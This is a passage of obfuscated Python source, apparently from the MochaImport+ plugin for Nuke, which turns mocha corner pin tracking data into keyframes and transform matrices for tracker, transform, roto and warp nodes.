    destinationBasis = dI(aP, aQ, aT, aU, aX, aY, bb, bc)
    # destination basis composed with the (adjugate) inverse of the source basis
    return dF(destinationBasis, dH(sourceBasis))
import nuke as b
class fG(object):
    """represents keyframes for a 4x4 transform matrix"""

    def __init__(a):
        # list of (frame, 16-value matrix) pairs, in insertion order
        a.data = []

    def deleteKey(a, B):
        """Remove the keyframe at frame B, if present.

        Fix: a list comprehension replaces filter() with a py2-only
        tuple-parameter lambda; on Python 3 filter() also returned an
        iterator, which would have broken the append in setKey.
        """
        a.data = [entry for entry in a.data if entry[0] != B]

    def setKey(a, key):
        """Set keyframe `key`, a (frame, matrix) pair with a 16-value matrix,
        replacing any existing key at the same frame.

        Fix: the pair is unpacked in the body instead of the py2-only
        tuple-parameter syntax `def setKey(a, (B, value))`; the call
        signature (one tuple argument) is unchanged.
        """
        B, value = key
        assert len(value) == 16
        a.deleteKey(B)
        a.data.append((B, value))

    def applyToCurvesLayer(a, bd):
        """Write all keys onto the 4x4 extra-matrix anim curves of layer bd."""
        dJ = bd.getTransform()
        ab = a._getDataAsTuples()
        for c in range(0, 4):
            for av in range(0, 4):
                ct = dJ.getExtraMatrixAnimCurve(c, av)
                ct.removeAllKeys()  # start each curve from scratch
                for B, value in ab[4 * c + av]:
                    ct.addKey(B, value)
                dJ.setExtraMatrixAnimCurve(c, av, ct)

    def applyToArrayKnob(a, knob):
        """Write all keys onto a 16-component array knob (e.g. a matrix knob)."""
        ab = a._getDataAsAnimations()
        knob.setAnimated()
        for c in range(0, 16):
            knob.animation(c).clear()
            knob.animation(c).addKey(ab[c])

    def _getDataAsAnimations(a):
        # one list of nuke.AnimationKey per matrix component
        ab = [[] for _component in range(16)]
        for B, value in a.data:
            for c in range(0, 16):
                ab[c].append(b.AnimationKey(B, value[c]))
        return ab

    def _getDataAsTuples(a):
        # one list of (frame, componentValue) tuples per matrix component
        ab = [[] for _component in range(16)]
        for B, value in a.data:
            for c in range(0, 16):
                ab[c].append((B, value[c]))
        return ab
def cu(d, referenceFrame):
    # Build 4x4 matrix keyframes (an fG instance) from corner pin data d,
    # expressing each frame's quad as a homography relative to the quad at
    # referenceFrame.
    t = d.getPointValues(0, 'x')
    J = d.getPointValues(0, 'y')
    K = d.getPointValues(1, 'x')
    L = d.getPointValues(1, 'y')
    M = d.getPointValues(2, 'x')
    N = d.getPointValues(2, 'y')
    V = d.getPointValues(3, 'x')
    W = d.getPointValues(3, 'y')
    af = fI(t, referenceFrame)  # index of the reference frame in the key lists
    dK = fG()
    if len(set([len(t), len(K), len(M), len(V), len(J), len(L), len(N), len(W)])) > 1:
        raise Exception('all corners must have the same amount of keyframes')
    for c in range(0, len(t)):
        S = t[c][0]  # frame number of this keyframe
        if len(set([t[c][0], K[c][0], M[c][0], V[c][0], J[c][0], L[c][0], N[c][0], W[c][0]])) > 1:
            raise Exception('times for keyframes of all four corners must be identical')
        # homography from the reference-frame quad to this frame's quad,
        # embedded in a 4x4 matrix by fC (args alternate ref/current per axis)
        m = fC(t[af][1], J[af][1], t[c][1], J[c][1], K[af][1], L[af][1], K[c][1], L[c][1], M[af][1], N[af][1], M[c][1],
               N[c][1], V[af][1], W[af][1], V[c][1], W[c][1])
        dK.setKey((S, m))
    return dK
def fI(dL, dM):
    """Return the index of the (frame, value) tuple in dL whose frame is dM;
    raises when no keyframe exists for that frame."""
    for index, entry in enumerate(dL):
        if entry[0] == dM:
            return index
    raise Exception("tracking data doesn't contain tracking data for frame " + str(
        dM) + '.\nPlease choose another reference frame.')
import nuke as b
def fJ(dN, toNode):
    """ children of fromNode become children of toNode"""
    for dependentNode in dN.dependent(b.INPUTS):
        for inputIndex in range(dependentNode.inputs()):
            if dependentNode.input(inputIndex) == dN:
                dependentNode.setInput(inputIndex, toNode)
def fK(dO):
    """run automatic layout on entire node graph of the group"""
    dO.begin()  # enter the group's graph context
    fL()        # autoplace everything inside it
    dO.end()    # leave the group context again
def fL():
    """run automatic layout on all nodes"""
    for graphNode in b.allNodes():
        graphNode.autoplace()
import nuke as b
def stabilizedPrecompNode___connectPrecompNodes(y, w):
    """Link the four pin knobs of corner pin node w to those of node y via
    expressions, so w follows y's pins."""
    ag = y.knob('name').value()
    for pin in ('pin1', 'pin2', 'pin3', 'pin4'):
        w[pin].setExpression(ag + '.' + pin + '.x', 0)
        w[pin].setExpression(ag + '.' + pin + '.y', 1)
import nuke as b
import nuke as b
def be(O, fM, fN):
    """Add the MochaImport+ tab to node O with two buttons that run the
    commands fM (load from file) and fN (load from clipboard)."""
    O.addKnob(b.Tab_Knob('mochaImport', 'MochaImport+'))
    headline = b.Text_Knob('loadMochaData', 'load mocha tracking data')
    headline.setFlag(b.STARTLINE)
    headline.setTooltip('load mocha Nuke corner pin (*.nk) data')
    headline.setValue('')
    O.addKnob(headline)
    buttonSpecs = (
        ('loadTrackingDataFromFile', 'from file',
         'import mocha corner pin data from a file\n\nrequired format: Nuke Corner Pin (*.nk)', fM),
        ('loadTrackingDataFromClipboard', 'from clipboard',
         'import mocha corner pin data from the clipboard\n\nrequired format: Nuke Corner Pin (*.nk)', fN),
    )
    for knobName, label, tooltip, command in buttonSpecs:
        button = b.PyScript_Knob(knobName, label)
        button.setTooltip(tooltip)
        button.setCommand(dP(command))  # dP wraps the command in an install check
        O.addKnob(button)
def dP(dQ):
    """Wrap single-line command *dQ* so it shows a hint when MochaImport+ is absent."""
    assert '\n' not in dQ
    guard = ' \nif not locals().has_key("mochaimport"):\n nuke.message("Please install MochaImport+ for NUKE (by mamoworld.com) to use this function")\nelse:\n {myCommand}\n'
    return guard.format(myCommand=dQ)
def fQ():
    """Create a Tracker3 node extended with MochaImport+ data loading; returns it."""
    tracker = b.createNode('Tracker3')
    be(tracker, 'mochaimport.trackerNodeMI___loadTracker3TrackingDataFromFilePopup(nuke.thisNode())',
       'mochaimport.trackerNodeMI___loadTracker3TrackingDataFromClipboard(nuke.thisNode())')
    for index in (1, 2, 3, 4):
        tracker['enable' + str(index)].setValue('true')
    tracker['label'].setValue('MochaImport+')
    return tracker
def trackerNodeMI___loadTracker3TrackingDataFromFilePopup(U):
    """Ask for a mocha corner pin (*.nk) file and load it into Tracker3 node *U*."""
    try:
        k = b.getFilename('Load Nuke Corner Pin Data from mocha', '*.nk')
        if k is None:
            return
        cx(U, an(k))
    except IOError as f:
        b.message('Could not read file {0}:\n\nI/O error({1}): {2}'.format(k, f.errno, f.strerror))
    except cornerPinData___FileFormatError as f:
        b.message('Could not read file {0}:\n\nInvalid File Format: {1}'.format(k, f.message))
def trackerNodeMI___loadTracker3TrackingDataFromClipboard(U):
    """Load mocha corner pin data from the clipboard into Tracker3 node *U*."""
    try:
        cx(U, ao())
    except cornerPinData___FileFormatError as f:
        b.message('Clipboard does not contain valid tracking data:\n{0}'.format(f.message))
def cx(O, d):
    """Write corner pin data *d* into the four track knobs of Tracker3 node *O*."""
    for corner in range(4):
        bH(O['track' + str(corner + 1)], d, corner)
def bH(bf, d, Y):
    """Key track knob *bf* with the x/y curves of corner *Y* from corner pin data *d*."""
    x_keys = Q(d.getPointValues(Y, 'x'))
    y_keys = Q(d.getPointValues(Y, 'y'))
    bf.setAnimated()
    for curve_index, keys in ((0, x_keys), (1, y_keys)):
        bf.animation(curve_index).clear()
        bf.animation(curve_index).addKey(keys)
def fR():
    """Create a Tracker4 node with four tracks and MochaImport+ data loading; returns it."""
    tracker = b.createNode('Tracker4')
    be(tracker, 'mochaimport.trackerNodeMI___loadTracker4TrackingDataFromFilePopup(nuke.thisNode())',
       'mochaimport.trackerNodeMI___loadTracker4TrackingDataFromClipboard(nuke.thisNode())')
    for _unused in range(4):
        tracker['add_track'].execute()
    tracker['label'].setValue('MochaImport+')
    return tracker
def fS(O):
    """Ensure Tracker4 node *O* has at least four tracks, adding any missing ones."""
    missing = 4 - fU(O)
    for _unused in range(missing):
        O['add_track'].execute()
def trackerNodeMI___loadTracker4TrackingDataFromFilePopup(o):
    """Ask for a mocha corner pin (*.nk) file and load it into Tracker4 node *o*."""
    try:
        k = b.getFilename('Load Nuke Corner Pin Data from mocha', '*.nk')
        if k is None:
            return
        cA(o, an(k))
    except IOError as f:
        b.message('Could not read file {0}:\n\nI/O error({1}): {2}'.format(k, f.errno, f.strerror))
    except cornerPinData___FileFormatError as f:
        b.message('Could not read file {0}:\n\nInvalid File Format: {1}'.format(k, f.message))
def trackerNodeMI___loadTracker4TrackingDataFromClipboard(o):
    """Load mocha corner pin data from the clipboard into Tracker4 node *o*."""
    try:
        cA(o, ao())
    except cornerPinData___FileFormatError as f:
        b.message('Clipboard does not contain valid tracking data:\n{0}'.format(f.message))
def cA(o, d):
    """Write corner pin data *d* into the first four tracks of Tracker4 node *o*.

    The 'tracks' knob is a flat array; each track occupies a stride of 31
    columns.  Offsets 2/3 are the x/y position curves; offsets 6/7/8 are
    set to 1 below -- presumably the per-track T/R/S enable flags; confirm
    against the Tracker4 column layout of the targeted Nuke version.
    """
    fS(o)  # make sure at least four tracks exist before writing
    bI = 2  # column offset within a track: x value
    bJ = 3  # column offset within a track: y value
    fV = 6  # column offset: enable flag (assumed -- see docstring)
    fW = 7  # column offset: enable flag
    fX = 8  # column offset: enable flag
    X = 31  # number of columns per track
    fY(o)  # clear any previous x/y animation on all four tracks
    ap = o['tracks']
    dS = b.ProgressTask('write tracking data')
    for c in [0, 1, 2, 3]:
        dS.setMessage('data for corner ' + str(c + 1))
        ap.setAnimated(X * c + bI)
        ap.setAnimated(X * c + bJ)
        cy = d.getPointValues(c, 'x')
        cz = d.getPointValues(c, 'y')
        for B, cB in cy:
            ap.setValueAt(cB, B, X * c + bI)
        for B, cC in cz:
            ap.setValueAt(cC, B, X * c + bJ)
        ap.setValue(1, X * c + fV)
        ap.setValue(1, X * c + fW)
        ap.setValue(1, X * c + fX)
        dS.setProgress(c * 25)
def fY(o):
    """Remove existing x/y animation from the first four tracks of Tracker4 node *o*."""
    track_stride = 31  # columns per track in the flat 'tracks' array
    x_offset, y_offset = 2, 3
    for corner in (0, 1, 2, 3):
        o['tracks'].clearAnimated(track_stride * corner + x_offset)
        o['tracks'].clearAnimated(track_stride * corner + y_offset)
def fZ(o):
    """Return one entry per track of Tracker4 node *o* (the first quoted field
    of each serialized track row -- presumably the track name).

    Nuke exposes no direct API for the track list, so this parses the
    serialized script text of the 'tracks' knob; the parsing is tightly
    coupled to Nuke's exact serialization format.
    """
    cr = o['tracks']  # NOTE(review): result unused -- appears to be dead code
    bF = o['tracks'].toScript().split(' \n} \n{ \n ')
    bF.pop(0)  # drop the column-definition section that precedes the track rows
    bg = str(bF)[2:].split('\\n')
    if bg:
        bg.pop(-1)  # discard trailing serialization artifacts
    if bg:
        bg.pop(-1)
    dT = []
    for c in bg:
        dT.append(c.split('"')[1])  # text between the first pair of quotes
    return dT
def fU(o):
    """Return how many tracks Tracker4 node *o* currently has."""
    return len(fZ(o))
import nuke as b
import pprint
import nuke as b
import math as H
def ga(bK, bL, bM, bN, bO, bP):
    """Solve the affine transform mapping the three source points
    (bK, bL, bM) onto the three target points (bN, bO, bP).

    Returns (a, b, tx, c, d, ty) such that
        x' = a*x + b*y + tx
        y' = c*x + d*y + ty
    """
    (x0, y0), (x1, y1), (x2, y2) = bK, bL, bM
    (u0, v0), (u1, v1), (u2, v2) = bN, bO, bP
    # shared denominators of the 2x2 linear system (Cramer's rule)
    denom_x = (x0 - x1) * (y0 - y2) - (x0 - x2) * (y0 - y1)
    denom_y = (y0 - y1) * (x0 - x2) - (y0 - y2) * (x0 - x1)
    a = ((u0 - u1) * (y0 - y2) - (u0 - u2) * (y0 - y1)) / denom_x
    bb = ((u0 - u1) * (x0 - x2) - (u0 - u2) * (x0 - x1)) / denom_y
    tx = u0 - a * x0 - bb * y0
    c = ((v0 - v1) * (y0 - y2) - (v0 - v2) * (y0 - y1)) / denom_x
    d = ((v0 - v1) * (x0 - x2) - (v0 - v2) * (x0 - x1)) / denom_y
    ty = v0 - c * x0 - d * y0
    return (a, bb, tx, c, d, ty)
def ge(m):
    """Decompose affine matrix m = (a, b, tx, c, d, ty) into translation,
    rotation (radians), shear and scale; returns them as a dict."""
    m_a = m[0]
    m_b = m[1]
    tx = m[2]
    m_c = m[3]
    m_d = m[4]
    ty = m[5]
    flipped = 0
    if m_a * m_d < 0:
        # mirrored transform: temporarily negate one axis so the
        # decomposition below sees a non-mirrored matrix
        if m_a < 0:
            flipped = 1
            m_a = -m_a
            m_b = -m_b
        else:
            flipped = 2
            m_d = -m_d
            m_c = -m_c
    angle_x = H.atan2(-m_b, m_a)
    angle_y = H.atan2(m_c, m_d)
    if abs(angle_x) < abs(angle_y):
        rotation = angle_x
        shear_x = 0
        shear_y = angle_y - angle_x
        scale_x = H.sqrt(m_a * m_a + m_b * m_b)
        scale_y = m_d / (H.cos(rotation) - H.sin(rotation) * H.tan(shear_y))
    else:
        rotation = angle_y
        shear_y = 0
        shear_x = angle_y - angle_x
        scale_y = H.sqrt(m_d * m_d + m_c * m_c)
        scale_x = m_a / (H.cos(rotation) + H.sin(rotation) * H.tan(shear_x))
    # undo the temporary axis flip by negating the matching scale
    if flipped == 1:
        scale_x = -scale_x
    if flipped == 2:
        scale_y = -scale_y
    return {'translation': (tx, ty), 'rotation': rotation, 'shear': (shear_x, shear_y), 'scale': (scale_x, scale_y)}
def hk(m):
    """Return the translation part (tx, ty) of affine matrix *m*."""
    return m[2], m[5]
def hl(m):
    """Return the rotation angle (radians) derived from the second row of *m*."""
    return H.atan(m[3] / m[4])
def hm(m):
    """Return (scale_x, scale_y) magnitudes of affine matrix *m*.

    NOTE(review): scale_x's sign follows m[0], but scale_y's sign follows
    m[1] (not a second-row entry) -- looks suspicious, preserved as-is.
    """
    m_a, m_b = m[0], m[1]
    m_c, m_d = m[3], m[4]
    scale_x = H.sqrt(m_a * m_a + m_b * m_b)
    scale_y = H.sqrt(m_c * m_c + m_d * m_d)
    if m_a < 0:
        scale_x = -scale_x
    if m_b < 0:
        scale_y = -scale_y
    return (scale_x, scale_y)
import math as H
class gf(object):
    """Abstract base class for transform data.

    Subclasses report which components they carry (position, scale,
    rotation, shear) and expose each as a list of (frame, value) tuples.
    """

    def hasPositionData(self):
        """Return True when position keyframes are available."""
        raise NotImplementedError('hasPositionData not implemented')

    def hasScaleData(self):
        """Return True when scale keyframes are available."""
        raise NotImplementedError('hasScaleData not implemented')

    def hasRotationData(self):
        """Return True when rotation keyframes are available."""
        raise NotImplementedError('hasRotationData not implemented')

    def hasShearData(self):
        """Return True when shear keyframes are available."""
        raise NotImplementedError('hasShearData not implemented')

    def getPositionValues(self, x):
        """for coordinate in 'x', 'y' returns a list of (frame,value) tuples"""
        raise NotImplementedError('getPositionValues not implemented')

    def getScaleValues(self, x):
        """for coordinate in 'x', 'y' returns a list of (frame,value) tuples"""
        raise NotImplementedError('getScaleValues not implemented')

    def getRotationValues(self):
        """returns a list of (frame,value) tuples"""
        raise NotImplementedError('getRotationValues not implemented')

    def getShearValues(self, x):
        """for coordinate in 'x', 'y' returns a list of (frame,value) tuples"""
        raise NotImplementedError('getShearValues not implemented')
class gg(gf):
    """Transform data that stores position, scale, rotation and shear as
    plain dictionaries of (frame, value) lists."""

    def __init__(self):
        self.data = {
            'position': {'x': [], 'y': []},
            'rotation': [],
            'scale': {'x': [], 'y': []},
            'shear': {'x': [], 'y': []},
        }

    def _hasXY(self, component):
        # True when either coordinate of the component has keys
        return bool(self.data[component]['x']) or bool(self.data[component]['y'])

    def hasPositionData(self):
        return self._hasXY('position')

    def hasScaleData(self):
        return self._hasXY('scale')

    def hasRotationData(self):
        return len(self.data['rotation']) > 0

    def hasShearData(self):
        return self._hasXY('shear')

    def getPositionValues(self, x):
        """for coordinate in 'x', 'y' returns a list of (frame,value) tuples"""
        assert x in ('x', 'y')
        return self.data['position'][x]

    def getScaleValues(self, x):
        """for coordinate in 'x', 'y' returns a list of (frame,value) tuples"""
        assert x in ('x', 'y')
        return self.data['scale'][x]

    def getRotationValues(self):
        """returns a list of (frame,value) tuples"""
        return self.data['rotation']

    def getShearValues(self, x):
        """for coordinate in 'x', 'y' returns a list of (frame,value) tuples"""
        assert x in ('x', 'y')
        return self.data['shear'][x]
class bV(gg):
    """Transform data obtained by converting corner pin data.

    The position channel is the centroid of the four corners; rotation,
    scale and shear are recovered per keyframe by solving the affine
    transform that maps three corners at the reference keyframe (index 0)
    onto the same corners at the current keyframe and decomposing it.
    """

    def __init__(a, d):
        super(bV, a).__init__()
        a.__importCpData(d)

    def __importCpData(a, d):
        # per-corner animation curves: lists of (frame, value)
        t = d.getPointValues(0, 'x')
        J = d.getPointValues(0, 'y')
        K = d.getPointValues(1, 'x')
        L = d.getPointValues(1, 'y')
        M = d.getPointValues(2, 'x')
        N = d.getPointValues(2, 'y')
        V = d.getPointValues(3, 'x')
        W = d.getPointValues(3, 'y')
        if len(set([len(t), len(K), len(M), len(V), len(J), len(L), len(N), len(W)])) > 1:
            raise Exception('all corners must have the same amount of keyframes')
        positions_x = []
        positions_y = []
        rotations = []
        scales_x = []
        scales_y = []
        shears_x = []
        shears_y = []
        for c in range(0, len(t)):
            S = t[c][0]
            if len(set([t[c][0], K[c][0], M[c][0], V[c][0], J[c][0], L[c][0], N[c][0], W[c][0]])) > 1:
                raise Exception('times for keyframes of all four corners must be identical')
            center_x = (t[c][1] + K[c][1] + M[c][1] + V[c][1]) / 4
            center_y = (J[c][1] + L[c][1] + N[c][1] + W[c][1]) / 4
            positions_x.append((S, center_x))
            positions_y.append((S, center_y))
            ref = 0  # keyframe index used as the reference pose
            ref_x = positions_x[ref][1]
            # BUGFIX: the y offset previously read the x-centroid list; it
            # must use the y centroid.  The decomposed linear part (scale/
            # rotation/shear) is invariant to this uniform shift, so this
            # only improves numerical conditioning of the solve.
            ref_y = positions_y[ref][1]
            # three corners at the reference keyframe, centered ...
            p0 = [t[ref][1] - ref_x, J[ref][1] - ref_y]
            p1 = [K[ref][1] - ref_x, L[ref][1] - ref_y]
            p2 = [M[ref][1] - ref_x, N[ref][1] - ref_y]
            # ... and the same corners at the current keyframe
            q0 = [t[c][1] - ref_x, J[c][1] - ref_y]
            q1 = [K[c][1] - ref_x, L[c][1] - ref_y]
            q2 = [M[c][1] - ref_x, N[c][1] - ref_y]
            components = ge(ga(p0, p1, p2, q0, q1, q2))
            scales_x.append((S, components['scale'][0]))
            scales_y.append((S, components['scale'][1]))
            rotations.append((S, H.degrees(components['rotation'])))
            shears_x.append((S, components['shear'][0]))
            shears_y.append((S, components['shear'][1]))
        a.data['position']['x'] = positions_x
        a.data['position']['y'] = positions_y
        a.data['scale']['x'] = scales_x
        a.data['scale']['y'] = scales_y
        a.data['rotation'] = rotations
        a.data['shear']['x'] = shears_x
        a.data['shear']['y'] = shears_y
import pprint
class cF(Exception):
    """Raised when the user disabled every 'import ... data' checkbox."""

    def __init__(self):
        self.message = 'Please choose at least one type of data that you want to import.'
def gj():
    """Create a Transform node extended with MochaImport+ data loading.

    Now returns the created node, consistent with the other node factories
    (fQ, fR, cJ); previously the node was created but not returned.
    """
    g = b.createNode('Transform')
    be(g, 'mochaimport.transformNodeMI___loadTransformTrackingDataFromFilePopup(nuke.thisNode())',
       'mochaimport.transformNodeMI___loadTransformTrackingDataFromClipboard(nuke.thisNode())')
    for cG in ['translate', 'rotate', 'scale', 'skew']:
        gk(cG, g)
    g['label'].setValue('MochaImport+')
    return g
def gk(name, node):
    """Add an 'import <name> data' checkbox knob to *node*, enabled by default."""
    checkbox = b.Boolean_Knob('import' + name + 'data', 'import ' + name + ' data')
    checkbox.setTooltip('whether loading the mocha data generates keyframes for ' + name)
    checkbox.setValue(True)
    checkbox.setFlag(b.STARTLINE)
    node.addKnob(checkbox)
def transformNodeMI___loadTransformTrackingDataFromFilePopup(g):
    """Ask for a mocha corner pin (*.nk) file and key Transform node *g* from it."""
    try:
        eh(g)  # verify at least one import checkbox is enabled
        k = b.getFilename('Load Nuke Corner Pin Data from mocha', '*.nk')
        if k is None:
            return
        cH(g, bV(an(k)))
    except IOError as f:
        b.message('Could not read file {0}:\n\nI/O error({1}): {2}'.format(k, f.errno, f.strerror))
    except cornerPinData___FileFormatError as f:
        b.message('Could not read file {0}:\n\nInvalid File Format: {1}'.format(k, f.message))
    except cF as f:
        b.message(f.message)
def transformNodeMI___loadTransformTrackingDataFromClipboard(g):
    """Key Transform node *g* from mocha corner pin data on the clipboard."""
    try:
        eh(g)  # verify at least one import checkbox is enabled
        cH(g, bV(ao()))
    except cornerPinData___FileFormatError as f:
        b.message('Clipboard does not contain valid tracking data:\n{0}'.format(f.message))
    except cF as f:
        b.message(f.message)
def eh(g):
    """Raise cF unless at least one import-data checkbox on *g* is enabled."""
    enabled = (g['import' + channel + 'data'].getValue()
               for channel in ('translate', 'rotate', 'scale', 'skew'))
    if not any(enabled):
        raise cF()
def cH(g, u):
    """Key the knobs of Transform node *g* from transform data *u*.

    Only channels whose 'import...data' checkbox is enabled are written.
    Q converts a (frame, value) list into the form addKey expects.
    The center is always reset to a static (0, 0) key at the end.
    """
    if u.hasPositionData() and g['importtranslatedata'].getValue():
        gl = Q(u.getPositionValues('x'))  # x translation keys
        gm = Q(u.getPositionValues('y'))  # y translation keys
        g['translate'].clearAnimated()
        g['translate'].setAnimated()
        g['translate'].animation(0).addKey(gl)
        g['translate'].animation(1).addKey(gm)
    if u.hasScaleData() and g['importscaledata'].getValue():
        bj = Q(u.getScaleValues('x'))
        bk = Q(u.getScaleValues('y'))
        g['scale'].clearAnimated()
        g['scale'].setAnimated()
        g['scale'].setValue(1, 1)  # why: seed the second scale field before keying
        g['scale'].animation(0).addKey(bj)
        g['scale'].animation(1).addKey(bk)
    if u.hasRotationData() and g['importrotatedata'].getValue():
        aB = Q(u.getRotationValues())
        g['rotate'].clearAnimated()
        g['rotate'].setAnimated()
        g['rotate'].animation(0).addKey(aB)
    if u.hasShearData() and g['importskewdata'].getValue():
        gn = Q(u.getShearValues('x'))
        go = Q(u.getShearValues('y'))
        g['skewX'].clearAnimated()
        g['skewX'].setAnimated()
        g['skewX'].animation(0).addKey(gn)
        g['skewY'].clearAnimated()
        g['skewY'].setAnimated()
        g['skewY'].animation(0).addKey(go)
    g['center'].clearAnimated()
    g['center'].setAnimated()
    g['center'].animation(0).setKey(0, 0)
    g['center'].animation(1).setKey(0, 0)
import nukescripts
import random
import nuke as b
import nuke.rotopaint as gp
import nuke as b
import nuke.rotopaint as gp
def cI(bo):
    """Return a flat list of all elements in curves knob *bo*, root layer first."""
    return ei(bo.rootLayer, [bo.rootLayer])
def ei(bd, list):
    """Recursively collect shapes, strokes and layers of rotopaint layer *bd*
    into *list* and return it.

    (The parameter name shadows the builtin 'list'; kept for interface
    compatibility.)
    """
    for element in bd:
        # NOTE: a discarded element.getAttributes() call was removed here;
        # its result was never used (assumed to be a side-effect-free getter).
        if isinstance(element, b.rotopaint.Shape):
            list.append(element)
        if isinstance(element, b.rotopaint.Stroke):
            list.append(element)
        if isinstance(element, b.rotopaint.Layer):
            list.append(element)
            ei(element, list)
    return list
def ej(gq):
    """Return the names of the given rotopaint elements as a list.

    A list comprehension replaces map+lambda so the result is a real list
    under both Python 2 and Python 3 (map is a lazy iterator on Python 3,
    which would break consumers that index or reuse the result).
    """
    return [element.name for element in gq]
def gr():
    """Create a RotoPaint+ node (RotoPaint with MochaImport+ controls)."""
    return cJ('RotoPaint')


def gs():
    """Create a Roto+ node (Roto with MochaImport+ controls)."""
    return cJ('Roto')


def gt():
    """Create a SplineWarp+ node (SplineWarp3 with MochaImport+ controls)."""
    return cJ('SplineWarp3')
def cJ(gu):
    """Create a node of class *gu* (Roto/RotoPaint/SplineWarp3) with
    MochaImport+ controls, including a layer-selection menu; returns it."""
    node = b.createNode(gu)
    be(node, 'mochaimport.RotoPaintNodeMI___loadTransformMatrixFromFilePopup(nuke.thisNode())',
       'mochaimport.RotoPaintNodeMI___loadTransformMatrixFromFromClipboard(nuke.thisNode())')
    layer_names = ej(cI(node['curves']))
    layer_knob = b.Enumeration_Knob('trackingDataLayerMI', 'apply to layer', layer_names)
    layer_knob.setTooltip('choose here to which layer the tracking data should be applied.')
    node.addKnob(layer_knob)
    el(node)
    node['label'].setValue('MochaImport+')
    return node
def RotoPaintNodeMI___loadTransformMatrixFromFilePopup(E):
    """Ask for a mocha corner pin (*.nk) file and apply it to roto node *E*."""
    try:
        k = b.getFilename('Load Nuke Corner Pin Data from mocha', '*.nk')
        if k is None:
            return
        cM(E, an(k))
    except IOError as f:
        b.message('Could not read file {0}:\n\nI/O error({1}): {2}'.format(k, f.errno, f.strerror))
    except cornerPinData___FileFormatError as f:
        b.message('Could not read file {0}:\n\nInvalid File Format: {1}'.format(k, f.message))
def RotoPaintNodeMI___loadTransformMatrixFromFromClipboard(E):
    """Apply mocha corner pin data from the clipboard to roto node *E*."""
    try:
        cM(E, ao())
    except cornerPinData___FileFormatError as f:
        b.message('Clipboard does not contain valid tracking data:\n{0}'.format(f.message))
def cM(E, d, cN=None, referenceFrame=None):
    """Apply corner pin data *d* as an animated matrix to one layer of roto node *E*.

    *cN* is the flat layer index (defaults to the node's layer menu);
    *referenceFrame* defaults to the node's reference-frame setting.
    """
    curves = E['curves']
    if cN is None:
        cN = int(E['trackingDataLayerMI'].getValue())
    target_layer = cI(curves)[cN]
    if referenceFrame is None:
        referenceFrame = em(E)
    cu(d, referenceFrame).applyToCurvesLayer(target_layer)
    curves.changed()
def em(node):
    """Return the reference frame configured on *node* (current frame when the checkbox is set)."""
    if node['useCurrentFrameAsReferenceFrame'].getValue():
        return int(b.frame())
    return int(node['referenceFrameMI'].getValue())
def el(node):
    """Add the reference-frame knob pair to *node* and sync their enabled state."""
    frame_knob = b.Array_Knob('referenceFrameMI', 'reference frame')
    frame_knob.setTooltip('at this frame, the shapes will preserve their position when the tracking data is loaded.')
    node.addKnob(frame_knob)
    use_current = b.Boolean_Knob('useCurrentFrameAsReferenceFrame', 'use current frame')
    use_current.setTooltip('at this frame, the shapes will preserve their position when the tracking data is loaded.')
    use_current.setValue(True)
    node.addKnob(use_current)
    en(node)
def en(node):
    """Grey out the reference-frame knob while 'use current frame' is checked."""
    use_current = node['useCurrentFrameAsReferenceFrame']
    reference = node['referenceFrameMI']
    if not use_current or not reference:
        return
    reference.setEnabled(not use_current.getValue())
def bX():
    """knobChanged callback: refresh the reference-frame enabled state."""
    node = b.thisNode()
    changed = b.thisKnob()
    if changed.name() == 'useCurrentFrameAsReferenceFrame':
        en(node)
def cO():
    """knobChanged callback: refresh the layer menu when the curves knob changes."""
    node = b.thisNode()
    changed = b.thisKnob()
    if changed.name() != 'curves':
        return
    if node.knob('trackingDataLayerMI'):
        node['trackingDataLayerMI'].setValues(ej(cI(changed)))
# Module-level callback registration: cO keeps the 'apply to layer' menu in
# sync with the curves knob; bX greys out the reference-frame knob while
# 'use current frame' is ticked, for every node class MochaImport+ extends.
b.addKnobChanged(cO, nodeClass='RotoPaint')
b.addKnobChanged(cO, nodeClass='Roto')
b.addKnobChanged(cO, nodeClass='SplineWarp3')
b.addKnobChanged(bX, nodeClass='RotoPaint')
b.addKnobChanged(bX, nodeClass='Roto')
b.addKnobChanged(bX, nodeClass='GridWarp3')
b.addKnobChanged(bX, nodeClass='SplineWarp3')
def gy():
    """Create a GridWarp+ node (GridWarp3 with MochaImport+ controls); returns it."""
    node = b.createNode('GridWarp3')
    be(node, 'mochaimport.RotoPaintNodeMI___loadTransformMatrixFromFilePopupGridWarp(nuke.thisNode())',
       'mochaimport.RotoPaintNodeMI___loadTransformMatrixFromFromClipboardGridWarp(nuke.thisNode())')
    el(node)
    node['label'].setValue('MochaImport+')
    return node
def RotoPaintNodeMI___loadTransformMatrixFromFilePopupGridWarp(node):
    """Ask for a mocha corner pin (*.nk) file and key the GridWarp source matrix from it."""
    try:
        k = b.getFilename('Load Nuke Corner Pin Data from mocha', '*.nk')
        if k is None:
            return
        eo(node, an(k), 'source_grid_transform_matrix')
    except IOError as f:
        b.message('Could not read file {0}:\n\nI/O error({1}): {2}'.format(k, f.errno, f.strerror))
    except cornerPinData___FileFormatError as f:
        b.message('Could not read file {0}:\n\nInvalid File Format: {1}'.format(k, f.message))
def RotoPaintNodeMI___loadTransformMatrixFromFromClipboardGridWarp(node):
    """Key the GridWarp source matrix from mocha corner pin data on the clipboard."""
    try:
        eo(node, ao(), 'source_grid_transform_matrix')
    except cornerPinData___FileFormatError as f:
        b.message('Clipboard does not contain valid tracking data:\n{0}'.format(f.message))
def eo(node, d, gz):
    """Apply corner pin data *d* as an animated matrix to array knob *gz* of *node*."""
    reference = em(node)
    cu(d, reference).applyToArrayKnob(node[gz])
import nuke as b
import os as al
import nuke as b
def hn(ep):
    """Autoplace all nodes in *ep*, then snap each one to the grid."""
    for node in ep:
        node.autoplace()
    for node in ep:
        b.autoplaceSnap(node)
class gA(object):
    """places nodes in a regular grid distance relative to each other"""

    def __init__(a):
        a.setGridSize(140, 120)

    def setGridSize(a, gB, gC):
        """Set the horizontal (*gB*) / vertical (*gC*) grid step in pixels."""
        a.dx = gB
        a.dy = gC

    def placeNodeRelativeToNode(a, bZ, ca, ac, aJ):
        """places nodeToPlace x (y) grid steps away from nodeReference in x (y) direction"""
        gD = ca.screenWidth() - bZ.screenWidth()
        gE = ca.screenHeight() - bZ.screenHeight()
        # // keeps positions integral on Python 3; identical to the old
        # int '/' under Python 2 (floor division for ints)
        bZ.setXpos(ca.xpos() + ac * a.dx + gD // 2)
        bZ.setYpos(ca.ypos() + aJ * a.dy + gE // 2)
import re
def cP(gF):
    """Deselect every currently selected node, then select only *gF*."""
    for node in b.selectedNodes():
        node.setSelected(False)
    gF.setSelected(True)
def gG():
